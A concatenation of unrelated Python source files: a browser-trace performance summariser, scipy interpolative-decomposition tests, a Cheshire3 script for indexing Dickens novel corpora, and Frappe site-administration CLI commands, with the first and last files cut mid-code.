if ('url' in slice.args['data'] and
slice.args['data']['url'] != '' and
re.search('^http', slice.args['data']['url'])):
url = slice.args['data']['url']
elif ('scriptName' in slice.args['data'] and
slice.args['data']['scriptName'] != '' and
re.search('^http', slice.args['data']['scriptName'])):
url = slice.args['data']['scriptName']
return url
def create_action_details_from_trace (self, project, labels, time_ranges,
threads, trace_info, extended_info):
if (type(labels) is not list):
return []
results = {}
first_paint_time = None
dom_content_loaded_time = None
load_time = None
create_action_if_needed = (len(labels) == 0)
to_save = []
def sum(l):
total = 0
for v in l:
total += v
return total
# Default the trace date to the time the blob was uploaded.
trace_date = trace_info.date
if ('datetime' in extended_info):
try:
# Get the date, parse it, and set back to UTC for AppEngine
trace_date = dateparse(extended_info['datetime'])
trace_date = trace_date.replace(tzinfo=None) + trace_date.utcoffset()
except Exception, e:
# Fail nicely
trace_date = trace_info.date
speed_index = -1
if ('speed-index' in extended_info):
try:
speed_index = int(extended_info['speed-index'])
except Exception, e:
# No need to worry. If we get a non-numeric speed index, ignore it.
speed_index = -1
# Step 1: go through all time ranges, and match to the correct Action.
for time_range in time_ranges:
name = time_range.name
# Try and find the action. If we're unsuccessful, bail out from this
# time range and move to the next one.
action = self.get_action_from_label(name,
create_action_if_needed, project)
if (action == None):
continue
result = {
'Duration': time_range.duration,
'Frames': 0,
'ParseHTML': [],
'JavaScript': [],
'Styles': [],
'UpdateLayerTree': [],
'Layout': [],
'Paint': [],
'Raster': [],
'Composite': []
}
result_extended_info = {
'JavaScript': {}
}
# If there's a commit ID in the post, add that as an extended item.
if 'commit' in extended_info:
result_extended_info['commit'] = {
"commit": extended_info['commit']
}
# Same goes for the WPT id.
if 'webpagetest-id' in extended_info:
result_extended_info['webpagetest-id'] = {
"webpagetest-id": extended_info['webpagetest-id']
}
# Step through each thread.
for t in threads:
# Start with the events for the thread.
for q in t.GetAllEvents():
# In the events there should be DOMContentLoaded etc.
if q.name == "MarkDOMContent" and dom_content_loaded_time == None:
dom_content_loaded_time = q.start
elif q.name == "MarkFirstPaint" and first_paint_time == None:
first_paint_time = q.start
elif q.name == "MarkLoad" and load_time == None:
load_time = q.start
# The compositor thread may have the frame info, so we'll use that.
elif (q.name == 'DrawFrame' and
q.start > time_range.start and
q.start <= time_range.start + time_range.duration):
result['Frames'] += 1
# Then jump to the slices.
for s in t.IterAllSlicesInRange(time_range.start,
time_range.start + time_range.duration):
# Get the thread duration if possible, and the duration if not.
duration = self.get_best_duration_for_slice(s)
# Same for the immediate children.
children_duration = self.get_immediate_child_slice_durations(s)
if s.name == 'ParseHTML':
result['ParseHTML'].append(duration)
elif (s.name == 'FunctionCall' or
s.name == 'EvaluateScript' or
s.name == 'MajorGC' or
s.name == 'MinorGC' or
s.name == 'GCEvent'):
result['JavaScript'].append(duration)
# If we have JS Stacks find out who the culprits are for the
# JavaScript that is running.
owner_domain = self.get_javascript_url_from_stack_info(s)
if owner_domain != None:
# Parse the domain
parsed_owner_domain = urlparse(owner_domain)
domain = parsed_owner_domain.netloc
if domain not in result_extended_info['JavaScript']:
result_extended_info['JavaScript'][domain] = 0
result_extended_info['JavaScript'][domain] += duration
elif (s.name == 'UpdateLayoutTree' or
s.name == 'RecalculateStyles' or
s.name == 'ParseAuthorStyleSheet'):
result['Styles'].append(duration)
elif s.name == 'UpdateLayerTree':
result['UpdateLayerTree'].append(duration)
elif s.name == 'Layout':
result['Layout'].append(duration)
elif (s.name == 'Paint'):
result['Paint'].append(duration)
elif (s.name == 'RasterTask' or
s.name == 'Rasterize'):
result['Raster'].append(duration)
elif (s.name == 'CompositeLayers'):
result['Composite'].append(duration)
# Step 2: Summarize
timeInSeconds = result['Duration'] / float(1000)
if (timeInSeconds == 0):
timeInSeconds = 1
fps = result['Frames'] / timeInSeconds
action_details_extended_info = []
for extended_type, entry in result_extended_info.iteritems():
for extended_name, extended_value in entry.iteritems():
action_detail_extended = ActionDetailExtended(
type=extended_type,
name=extended_name,
value=str(extended_value)
)
# Append it to the list of items that need to be referenced
# by the ActionDetail that's about to be created.
action_details_extended_info.append(action_detail_extended)
action_detail = ActionDetail(
parent=action.key,
duration=result['Duration'],
parse_html=sum(result['ParseHTML']),
javascript=sum(result['JavaScript']),
styles=sum(result['Styles']),
update_layer_tree=sum(result['UpdateLayerTree']),
layout=sum(result['Layout']),
paint=sum(result['Paint']),
raster=sum(result['Raster']),
composite=sum(result['Composite']),
frames_per_second=fps,
date=(trace_date + timedelta(0, 0, 0, time_range.start)),
first_paint_time=first_paint_time,
dom_content_loaded_time=dom_content_loaded_time,
load_time=load_time,
speed_index=speed_index
)
# If there's any extended info for this ActionDetail, append it now.
if (len(action_details_extended_info)):
action_detail.extended_info = action_details_extended_info
# Add this action to the list of things to be saved
to_save.append(action_detail)
# Step 3: Store the ActionDetails
if (len(to_save) > 0):
ndb.put_multi(to_save)
return to_save
def get_best_duration_for_slice (self, slice):
duration = 0
if (slice.thread_duration != None):
duration = slice.thread_duration
elif (slice.duration != None):
duration = slice.duration
return duration
def get_immediate_child_slice_durations (self, slice):
duration = 0
for s in slice.sub_slices:
if (s.thread_duration != None):
duration += s.thread_duration
elif (s.duration != None):
duration += s.duration
return duration
|
|
#******************************************************************************
# Copyright (C) 2013 Kenneth L. Ho
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer. Redistributions in binary
# form must reproduce the above copyright notice, this list of conditions and
# the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# None of the names of the copyright holders may be used to endorse or
# promote products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#******************************************************************************
import scipy.linalg.interpolative as pymatrixid
import numpy as np
from scipy.linalg import hilbert, svdvals, norm
from scipy.sparse.linalg import aslinearoperator
from scipy.linalg.interpolative import interp_decomp
from numpy.testing import (assert_, assert_allclose, assert_equal,
assert_array_equal)
import pytest
from pytest import raises as assert_raises
import sys
_IS_32BIT = (sys.maxsize < 2**32)
@pytest.fixture()
def eps():
yield 1e-12
@pytest.fixture(params=[np.float64, np.complex128])
def A(request):
# construct Hilbert matrix
# set parameters
n = 300
yield hilbert(n).astype(request.param)
@pytest.fixture()
def L(A):
yield aslinearoperator(A)
@pytest.fixture()
def rank(A, eps):
S = np.linalg.svd(A, compute_uv=False)
try:
rank = np.nonzero(S < eps)[0][0]
except IndexError:
rank = A.shape[0]
return rank
class TestInterpolativeDecomposition:
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
def test_real_id_fixed_precision(self, A, L, eps, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
# Test ID routines on a Hilbert matrix.
A_or_L = A if not lin_op else L
k, idx, proj = pymatrixid.interp_decomp(A_or_L, eps, rand=rand)
B = pymatrixid.reconstruct_matrix_from_id(A[:, idx[:k]], idx, proj)
assert_allclose(A, B, rtol=eps, atol=1e-08)
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
def test_real_id_fixed_rank(self, A, L, eps, rank, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
k = rank
A_or_L = A if not lin_op else L
idx, proj = pymatrixid.interp_decomp(A_or_L, k, rand=rand)
B = pymatrixid.reconstruct_matrix_from_id(A[:, idx[:k]], idx, proj)
assert_allclose(A, B, rtol=eps, atol=1e-08)
@pytest.mark.parametrize("rand,lin_op", [(False, False)])
def test_real_id_skel_and_interp_matrices(
self, A, L, eps, rank, rand, lin_op):
k = rank
A_or_L = A if not lin_op else L
idx, proj = pymatrixid.interp_decomp(A_or_L, k, rand=rand)
P = pymatrixid.reconstruct_interp_matrix(idx, proj)
B = pymatrixid.reconstruct_skel_matrix(A, k, idx)
assert_allclose(B, A[:, idx[:k]], rtol=eps, atol=1e-08)
assert_allclose(B @ P, A, rtol=eps, atol=1e-08)
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
def test_svd_fixed_precison(self, A, L, eps, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
A_or_L = A if not lin_op else L
U, S, V = pymatrixid.svd(A_or_L, eps, rand=rand)
B = U * S @ V.T.conj()
assert_allclose(A, B, rtol=eps, atol=1e-08)
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
def test_svd_fixed_rank(self, A, L, eps, rank, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
k = rank
A_or_L = A if not lin_op else L
U, S, V = pymatrixid.svd(A_or_L, k, rand=rand)
B = U * S @ V.T.conj()
assert_allclose(A, B, rtol=eps, atol=1e-08)
def test_id_to_svd(self, A, eps, rank):
k = rank
idx, proj = pymatrixid.interp_decomp(A, k, rand=False)
U, S, V = pymatrixid.id_to_svd(A[:, idx[:k]], idx, proj)
B = U * S @ V.T.conj()
assert_allclose(A, B, rtol=eps, atol=1e-08)
def test_estimate_spectral_norm(self, A):
s = svdvals(A)
norm_2_est = pymatrixid.estimate_spectral_norm(A)
assert_allclose(norm_2_est, s[0], rtol=1e-6, atol=1e-8)
def test_estimate_spectral_norm_diff(self, A):
B = A.copy()
B[:, 0] *= 1.2
s = svdvals(A - B)
norm_2_est = pymatrixid.estimate_spectral_norm_diff(A, B)
assert_allclose(norm_2_est, s[0], rtol=1e-6, atol=1e-8)
def test_rank_estimates_array(self, A):
B = np.array([[1, 1, 0], [0, 0, 1], [0, 0, 1]], dtype=A.dtype)
for M in [A, B]:
rank_tol = 1e-9
rank_np = np.linalg.matrix_rank(M, norm(M, 2) * rank_tol)
rank_est = pymatrixid.estimate_rank(M, rank_tol)
assert_(rank_est >= rank_np)
assert_(rank_est <= rank_np + 10)
def test_rank_estimates_lin_op(self, A):
B = np.array([[1, 1, 0], [0, 0, 1], [0, 0, 1]], dtype=A.dtype)
for M in [A, B]:
ML = aslinearoperator(M)
rank_tol = 1e-9
rank_np = np.linalg.matrix_rank(M, norm(M, 2) * rank_tol)
rank_est = pymatrixid.estimate_rank(ML, rank_tol)
assert_(rank_est >= rank_np - 4)
assert_(rank_est <= rank_np + 4)
def test_rand(self):
pymatrixid.seed('default')
assert_allclose(pymatrixid.rand(2), [0.8932059, 0.64500803],
rtol=1e-4, atol=1e-8)
pymatrixid.seed(1234)
x1 = pymatrixid.rand(2)
assert_allclose(x1, [0.7513823, 0.06861718], rtol=1e-4, atol=1e-8)
np.random.seed(1234)
pymatrixid.seed()
x2 = pymatrixid.rand(2)
np.random.seed(1234)
pymatrixid.seed(np.random.rand(55))
x3 = pymatrixid.rand(2)
assert_allclose(x1, x2)
assert_allclose(x1, x3)
def test_badcall(self):
A = hilbert(5).astype(np.float32)
with assert_raises(ValueError):
pymatrixid.interp_decomp(A, 1e-6, rand=False)
def test_rank_too_large(self):
# svd(array, k) should not segfault
a = np.ones((4, 3))
with assert_raises(ValueError):
pymatrixid.svd(a, 4)
def test_full_rank(self):
eps = 1.0e-12
# fixed precision
A = np.random.rand(16, 8)
k, idx, proj = pymatrixid.interp_decomp(A, eps)
assert_equal(k, A.shape[1])
P = pymatrixid.reconstruct_interp_matrix(idx, proj)
B = pymatrixid.reconstruct_skel_matrix(A, k, idx)
assert_allclose(A, B @ P)
# fixed rank
idx, proj = pymatrixid.interp_decomp(A, k)
P = pymatrixid.reconstruct_interp_matrix(idx, proj)
B = pymatrixid.reconstruct_skel_matrix(A, k, idx)
assert_allclose(A, B @ P)
@pytest.mark.parametrize("dtype", [np.float_, np.complex_])
@pytest.mark.parametrize("rand", [True, False])
@pytest.mark.parametrize("eps", [1, 0.1])
def test_bug_9793(self, dtype, rand, eps):
if _IS_32BIT and dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
A = np.array([[-1, -1, -1, 0, 0, 0],
[0, 0, 0, 1, 1, 1],
[1, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 1]],
dtype=dtype, order="C")
B = A.copy()
interp_decomp(A.T, eps, rand=rand)
assert_array_equal(A, B)
|
|
#!/bin/env python
import getpass
import os
import sys
import traceback
from lxml import etree
from crypt import crypt
import cheshire3
from cheshire3.baseObjects import Session
from cheshire3.server import SimpleServer
from cheshire3.internal import cheshire3Root
from cheshire3.document import StringDocument
from settings.settings import DATA_DIRECTORY
try:
assert DATA_DIRECTORY
except:
raise ImportError("You have not specified the project-wide settings.\
Please do so in settings.py.")
print DATA_DIRECTORY
# Launch a Cheshire session
session = Session()
serverConfig = os.path.join(cheshire3Root, 'configs', 'serverConfig.xml')
serv = SimpleServer(session, serverConfig)
db = serv.get_object(session, 'db_dickens')
session.database = 'db_dickens'
qf = db.get_object(session, 'defaultQueryFactory')
df = db.get_object(session, 'SimpleDocumentFactory')
concStore = db.get_object(session, 'concordanceStore')
# authStore = db.get_object(session, 'authStore')
recStore = db.get_object(session, 'recordStore')
ampPreP = db.get_object(session, 'AmpPreParser')
xmlp = db.get_object(session, 'LxmlParser')
### index 19C material
if ('--ntc' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
indexWF = db.get_object(session, 'indexWorkflow')
data = DATA_DIRECTORY + 'ntc_novels'
df.load(session, data)
recStore.begin_storing(session)
db.begin_indexing(session)
errorCount= 0
for i, d in enumerate(df, start=1):
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
genia = geniaTxr.process_record(session, rec)
session.logger.log_info(session,
'Record {0} created'.format(i)
)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
session.logger.log_info(session,
'Record {0} stored'.format(i)
)
db.add_record(session, rec2)
indexWF.process(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
errorCount += 1
traceback.print_exc(file=sys.stdout)
session.logger.log_info(session,
'Finished with {0} errors'.format(errorCount)
)
recStore.commit_storing(session)
db.commit_indexing(session)
## index Dickens material
if ('--dickens' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
indexWF = db.get_object(session, 'indexWorkflow')
data = DATA_DIRECTORY + 'dickens_novels'
df.load(session, data)
recStore.begin_storing(session)
db.begin_indexing(session)
errorCount= 0
for i, d in enumerate(df, start=1):
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
genia = geniaTxr.process_record(session, rec)
session.logger.log_info(session,
'Record {0} created'.format(i)
)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
session.logger.log_info(session,
'Record {0} stored'.format(i)
)
db.add_record(session, rec2)
indexWF.process(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
errorCount += 1
traceback.print_exc(file=sys.stdout)
session.logger.log_info(session,
'Finished with {0} errors'.format(errorCount)
)
recStore.commit_storing(session)
db.commit_indexing(session)
if ('--addIndex' in sys.argv):
idx = db.get_object(session, 'idx-text-kwd-prox-unnrml')
recStore = db.get_object(session, 'recordStore')
idx.begin_indexing(session)
session.logger.log_debug(session, recStore.id)
session.logger.log_debug(session, idx.id)
# recStore = [recStore.fetch_record(session, '96')]
for i, rec in enumerate(recStore, start=1):
session.logger.log_info(session, str(i))
try:
idx.index_record(session, rec)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
idx.commit_indexing(session)
if ('-loadAll' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
indexWF = db.get_object(session, 'indexWorkflow')
data = DATA_DIRECTORY
df.load(session, data)
recStore.begin_storing(session)
db.begin_indexing(session)
for d in df:
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
print rec
genia = geniaTxr.process_record(session, rec)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
db.add_record(session, rec2)
indexWF.process(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
recStore.commit_storing(session)
db.commit_indexing(session)
if ('-indexAll' in sys.argv):
indexWF = db.get_object(session, 'indexWorkflow')
db.begin_indexing(session)
for i, rec in enumerate(recStore, start=1):
session.logger.log_info(session, str(i))
try:
indexWF.process(session, rec)
except Exception as e:
session.logger.log_error(session, str(e))
db.commit_indexing(session)
if ('-index' in sys.argv):
indexWF = db.get_object(session, 'indexWorkflow')
db.begin_indexing(session)
for i in range(0, 100):
rec = recStore.fetch_record(session, '%d' % i)
try:
indexWF.process(session, rec)
except Exception as e:
session.logger.log_error(session, str(e))
db.commit_indexing(session)
if ('-stru' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
recStore = db.get_object(session, 'struStore')
df = db.get_object(session, 'StruDocumentFactory')
df.load(session)
idx = db.get_object(session, 'stru-idx')
recStore.begin_storing(session)
idx.begin_indexing(session)
for d in df:
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
session.logger.log_debug(session, rec)
genia = geniaTxr.process_record(session, rec)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
db.add_record(session, rec2)
idx.index_record(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
recStore.commit_storing(session)
idx.commit_indexing(session)
if ('-cont' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
recStore = db.get_object(session, 'contStore')
df = db.get_object(session, 'ContDocumentFactory')
df.load(session)
idx = db.get_object(session, 'cont-idx')
recStore.begin_storing(session)
idx.begin_indexing(session)
for d in df:
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
session.logger.log_debug(session, rec)
genia = geniaTxr.process_record(session, rec)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
db.add_record(session, rec2)
idx.index_record(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
traceback.print_exc(file=sys.stdout)
recStore.commit_storing(session)
idx.commit_indexing(session)
if ('-adduser' in sys.argv):
un = raw_input('Please enter a username: ')
if not un:
inputError('You must enter a username for this user.')
pw = getpass.getpass('Please enter a password for this user: ')
if not (pw and len(pw)):
inputError('You must enter a password for this user.')
pw2 = getpass.getpass('Please re-enter the password to confirm: ')
if pw != pw2:
inputError('The two passwords submitted did not match. Please try again.')
rn = raw_input('Real name of this user (not mandatory): ')
addy = raw_input('Email address for this user (not mandatory): ')
xml = read_file('xsl/admin.xml').replace('%USERNAME%', un)
adminDict = {'%password%': crypt(pw, pw[:2]),
'%realName%': rn,
'%email%': addy
}
for k,v in adminDict.iteritems():
if v and len(v):
xml = xml.replace(k, '\n <%s>%s</%s>' % (k[1:-1],v,k[1:-1]))
else:
xml = xml.replace(k, '')
doc = StringDocument(xml)
rec = xmlp.process_document(session, doc)
id = rec.process_xpath(session, '/config/@id')[0]
rec.id = id
authStore.store_record(session, rec)
authStore.commit_storing(session)
try:
user = authStore.fetch_object(session, id)
except c3errors.FileDoesNotExistException:
print 'ERROR: User not successfully created. Please try again.'
else:
print 'OK: Username and passwords set for this user'
#print user
sys.exit()
|
|
from __future__ import unicode_literals, absolute_import, print_function
import click
import hashlib, os, sys, compileall
import frappe
from frappe import _
from frappe.commands import pass_context, get_site
from frappe.commands.scheduler import _is_scheduler_enabled
from frappe.limits import update_limits, get_limits
from frappe.installer import update_site_config
from frappe.utils import touch_file, get_site_path
from six import text_type
# imports - third-party imports
from pymysql.constants import ER
# imports - module imports
from frappe.exceptions import SQLError
@click.command('new-site')
@click.argument('site')
@click.option('--db-name', help='Database name')
@click.option('--mariadb-root-username', default='root', help='Root username for MariaDB')
@click.option('--mariadb-root-password', help='Root password for MariaDB')
@click.option('--admin-password', help='Administrator password for new site', default=None)
@click.option('--verbose', is_flag=True, default=False, help='Verbose')
@click.option('--force', help='Force restore if site/database already exists', is_flag=True, default=False)
@click.option('--source_sql', help='Initiate database with a SQL file')
@click.option('--install-app', multiple=True, help='Install app after installation')
def new_site(site, mariadb_root_username=None, mariadb_root_password=None, admin_password=None, verbose=False, install_apps=None, source_sql=None, force=None, install_app=None, db_name=None):
"Create a new site"
frappe.init(site=site, new_site=True)
_new_site(db_name, site, mariadb_root_username=mariadb_root_username, mariadb_root_password=mariadb_root_password, admin_password=admin_password,
verbose=verbose, install_apps=install_app, source_sql=source_sql, force=force)
if len(frappe.utils.get_sites()) == 1:
use(site)
def _new_site(db_name, site, mariadb_root_username=None, mariadb_root_password=None, admin_password=None,
verbose=False, install_apps=None, source_sql=None,force=False, reinstall=False):
"""Install a new Frappe site"""
if not db_name:
db_name = hashlib.sha1(site.encode()).hexdigest()[:16]
from frappe.installer import install_db, make_site_dirs
from frappe.installer import install_app as _install_app
import frappe.utils.scheduler
frappe.init(site=site)
try:
# enable scheduler post install?
enable_scheduler = _is_scheduler_enabled()
except Exception:
enable_scheduler = False
make_site_dirs()
installing = None
try:
installing = touch_file(get_site_path('locks', 'installing.lock'))
install_db(root_login=mariadb_root_username, root_password=mariadb_root_password, db_name=db_name,
admin_password=admin_password, verbose=verbose, source_sql=source_sql,force=force, reinstall=reinstall)
apps_to_install = ['frappe'] + (frappe.conf.get("install_apps") or []) + (list(install_apps) or [])
for app in apps_to_install:
_install_app(app, verbose=verbose, set_as_patched=not source_sql)
frappe.utils.scheduler.toggle_scheduler(enable_scheduler)
frappe.db.commit()
scheduler_status = "disabled" if frappe.utils.scheduler.is_scheduler_disabled() else "enabled"
print("*** Scheduler is", scheduler_status, "***")
except frappe.exceptions.ImproperDBConfigurationError:
_drop_site(site, mariadb_root_username, mariadb_root_password, force=True)
finally:
if installing and os.path.exists(installing):
os.remove(installing)
frappe.destroy()
@click.command('restore')
@click.argument('sql-file-path')
@click.option('--mariadb-root-username', default='root', help='Root username for MariaDB')
@click.option('--mariadb-root-password', help='Root password for MariaDB')
@click.option('--db-name', help='Database name for site in case it is a new one')
@click.option('--admin-password', help='Administrator password for new site')
@click.option('--install-app', multiple=True, help='Install app after installation')
@click.option('--with-public-files', help='Restores the public files of the site, given path to its tar file')
@click.option('--with-private-files', help='Restores the private files of the site, given path to its tar file')
@pass_context
def restore(context, sql_file_path, mariadb_root_username=None, mariadb_root_password=None, db_name=None, verbose=None, install_app=None, admin_password=None, force=None, with_public_files=None, with_private_files=None):
"Restore site database from an sql file"
from frappe.installer import extract_sql_gzip, extract_tar_files
# Extract the gzip file if user has passed *.sql.gz file instead of *.sql file
if not os.path.exists(sql_file_path):
sql_file_path = '../' + sql_file_path
if not os.path.exists(sql_file_path):
print('Invalid path {0}' + sql_file_path[3:])
sys.exit(1)
if sql_file_path.endswith('sql.gz'):
sql_file_path = extract_sql_gzip(os.path.abspath(sql_file_path))
site = get_site(context)
frappe.init(site=site)
_new_site(frappe.conf.db_name, site, mariadb_root_username=mariadb_root_username,
mariadb_root_password=mariadb_root_password, admin_password=admin_password,
verbose=context.verbose, install_apps=install_app, source_sql=sql_file_path,
force=context.force)
# Extract public and/or private files to the restored site, if user has given the path
if with_public_files:
public = extract_tar_files(site, with_public_files, 'public')
os.remove(public)
if with_private_files:
private = extract_tar_files(site, with_private_files, 'private')
os.remove(private)
@click.command('reinstall')
@click.option('--admin-password', help='Administrator Password for reinstalled site')
@click.option('--yes', is_flag=True, default=False, help='Pass --yes to skip confirmation')
@pass_context
def reinstall(context, admin_password=None, yes=False):
"Reinstall site ie. wipe all data and start over"
site = get_site(context)
_reinstall(site, admin_password, yes, verbose=context.verbose)
def _reinstall(site, admin_password=None, yes=False, verbose=False):
if not yes:
click.confirm('This will wipe your database. Are you sure you want to reinstall?', abort=True)
try:
frappe.init(site=site)
frappe.connect()
frappe.clear_cache()
installed = frappe.get_installed_apps()
frappe.clear_cache()
except Exception:
installed = []
finally:
if frappe.db:
frappe.db.close()
frappe.destroy()
frappe.init(site=site)
_new_site(frappe.conf.db_name, site, verbose=verbose, force=True, reinstall=True,
install_apps=installed, admin_password=admin_password)
@click.command('install-app')
@click.argument('app')
@pass_context
def install_app(context, app):
"Install a new app to site"
from frappe.installer import install_app as _install_app
for site in context.sites:
frappe.init(site=site)
frappe.connect()
try:
_install_app(app, verbose=context.verbose)
finally:
frappe.destroy()
@click.command('list-apps')
@pass_context
def list_apps(context):
"List apps in site"
site = get_site(context)
frappe.init(site=site)
frappe.connect()
print("\n".join(frappe.get_installed_apps()))
frappe.destroy()
@click.command('add-system-manager')
@click.argument('email')
@click.option('--first-name')
@click.option('--last-name')
@click.option('--send-welcome-email', default=False, is_flag=True)
@pass_context
def add_system_manager(context, email, first_name, last_name, send_welcome_email):
"Add a new system manager to a site"
import frappe.utils.user
for site in context.sites:
frappe.connect(site=site)
try:
frappe.utils.user.add_system_manager(email, first_name, last_name, send_welcome_email)
frappe.db.commit()
finally:
frappe.destroy()
@click.command('disable-user')
@click.argument('email')
@pass_context
def disable_user(context, email):
site = get_site(context)
with frappe.init_site(site):
frappe.connect()
user = frappe.get_doc("User", email)
user.enabled = 0
user.save(ignore_permissions=True)
frappe.db.commit()
@click.command('migrate')
@click.option('--rebuild-website', help="Rebuild webpages after migration")
@pass_context
def migrate(context, rebuild_website=False):
"Run patches, sync schema and rebuild files/translations"
from frappe.migrate import migrate
for site in context.sites:
print('Migrating', site)
frappe.init(site=site)
frappe.connect()
try:
migrate(context.verbose, rebuild_website=rebuild_website)
finally:
frappe.destroy()
compileall.compile_dir('../apps', quiet=1)
@click.command('run-patch')
@click.argument('module')
@pass_context
def run_patch(context, module):
"Run a particular patch"
import frappe.modules.patch_handler
for site in context.sites:
frappe.init(site=site)
try:
frappe.connect()
frappe.modules.patch_handler.run_single(module, force=context.force)
finally:
frappe.destroy()
@click.command('reload-doc')
@click.argument('module')
@click.argument('doctype')
@click.argument('docname')
@pass_context
def reload_doc(context, module, doctype, docname):
"Reload schema for a DocType"
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
frappe.reload_doc(module, doctype, docname, force=context.force)
frappe.db.commit()
finally:
frappe.destroy()
@click.command('reload-doctype')
@click.argument('doctype')
@pass_context
def reload_doctype(context, doctype):
"Reload schema for a DocType"
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
frappe.reload_doctype(doctype, force=context.force)
frappe.db.commit()
finally:
frappe.destroy()
@click.command('use')
@click.argument('site')
def _use(site, sites_path='.'):
"Set a default site"
use(site, sites_path=sites_path)
def use(site, sites_path='.'):
with open(os.path.join(sites_path, "currentsite.txt"), "w") as sitefile:
sitefile.write(site)
@click.command('backup')
@click.option('--with-files', default=False, is_flag=True, help="Take backup with files")
@pass_context
def backup(context, with_files=False, backup_path_db=None, backup_path_files=None,
backup_path_private_files=None, quiet=False):
"Backup"
from frappe.utils.backups import scheduled_backup
verbose = context.verbose
for site in context.sites:
frappe.init(site=site)
frappe.connect()
odb = scheduled_backup(ignore_files=not with_files, backup_path_db=backup_path_db, backup_path_files=backup_path_files, backup_path_private_files=backup_path_private_files, force=True)
if verbose:
from frappe.utils import now
print("database backup taken -", odb.backup_path_db, "- on", now())
if with_files:
print("files backup taken -", odb.backup_path_files, "- on", now())
print("private files backup taken -", odb.backup_path_private_files, "- on", now())
frappe.destroy()
@click.command('remove-from-installed-apps')
@click.argument('app')
@pass_context
def remove_from_installed_apps(context, app):
"Remove app from site's installed-apps list"
from frappe.installer import remove_from_installed_apps
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
remove_from_installed_apps(app)
finally:
frappe.destroy()
@click.command('uninstall-app')
@click.argument('app')
@click.option('--yes', '-y', help='To bypass confirmation prompt for uninstalling the app', is_flag=True, default=False, multiple=True)
@click.option('--dry-run', help='List all doctypes that will be deleted', is_flag=True, default=False)
@pass_context
def uninstall(context, app, dry_run=False, yes=False):
"Remove app and linked modules from site"
from frappe.installer import remove_app
for site in context.sites:
try:
frappe.init(site=site)
frappe.connect()
remove_app(app, dry_run, yes)
finally:
frappe.destroy()
@click.command('drop-site')
@click.argument('site')
@click.option('--root-login', default='root')
@click.option('--root-password')
@click.option('--archived-sites-path')
@click.option('--force', help='Force drop-site even if an error is encountered', is_flag=True, default=False)
def drop_site(site, root_login='root', root_password=None, archived_sites_path=None, force=False):
_drop_site(site, root_login, root_password, archived_sites_path, force)
def _drop_site(site, root_login='root', root_password=None, archived_sites_path=None, force=False):
"Remove site from database and filesystem"
from frappe.installer import get_root_connection
from frappe.model.db_schema import DbManager
from frappe.utils.backups import scheduled_backup
frappe.init(site=site)
frappe.connect()
try:
scheduled_backup(ignore_files=False, force=True)
except SQLError as err:
if err[0] == ER.NO_SUCH_TABLE:
if force:
pass
else:
click.echo("="*80)
click.echo("Error: The operation has stopped because backup of {s}'s database failed.".format(s=site))
click.echo("Reason: {reason}{sep}".format(reason=err[1], sep="\n"))
